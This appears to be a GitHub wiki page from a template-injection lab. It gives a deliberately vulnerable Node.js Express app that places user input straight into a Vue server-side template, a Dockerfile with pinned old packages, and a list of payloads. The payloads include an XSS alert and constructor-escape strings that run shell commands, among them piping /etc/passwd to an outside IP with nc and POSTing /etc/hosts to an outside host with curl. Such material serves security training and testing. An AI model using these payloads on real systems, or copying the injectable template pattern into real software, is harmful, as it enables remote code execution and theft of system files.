SSTI nodejs 05 - yujitounai/helloworld GitHub Wiki
const express = require('express')
var bodyParser = require('body-parser');
const app = express()
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
//Dependent of Templating engine
const Vue = require('vue');
const renderer = require('vue-server-renderer').createRenderer()
const port = 5066
function getHTML(input){
var pre_template =`<!DOCTYPE html><html><body>
<form action="/" method="post">
First name:<br>
<input type="text" name="name" value="">
<input type="submit" value="Submit">
</form><p>Hello `+input+`</p></body></html>`
var app = new Vue({template: pre_template })
var html= "";
renderer.renderToString(app, (err, result) => {
if (err) throw err
html = result;
})
console.log(input);
return html;
}
app.post('/', (request, response) => {
var input = request.param('name', "")
var html = getHTML(input)
response.send(html);
})
app.get('/', (request, response) => {
var html = getHTML("")
response.send(html)
})
app.listen(port, (err) => {
if (err) {
return console.log('something bad happened', err)
}
console.log(`server is listening on ${port}`)
})
- Dockerfile
FROM node:6
COPY src/ /home
RUN npm install
RUN npm install [email protected]
RUN npm install [email protected]
RUN npm install [email protected]
#set($xss = '<script>alert(1);</script>') $xss
{{constructor.constructor("global.process.mainModule.require('child_process').execSync('sleep 5').toString()")()}}
{{constructor.constructor("global.process.mainModule.require('child_process').execSync('cat /etc/passwd | nc 192.168.5.33 7777').toString()")()}}
{{constructor.constructor("global.process.mainModule.require('child_process').execSync('curl -XPOST http://bogus.jp/postaccess.php -d @/etc/hosts').toString()")()}}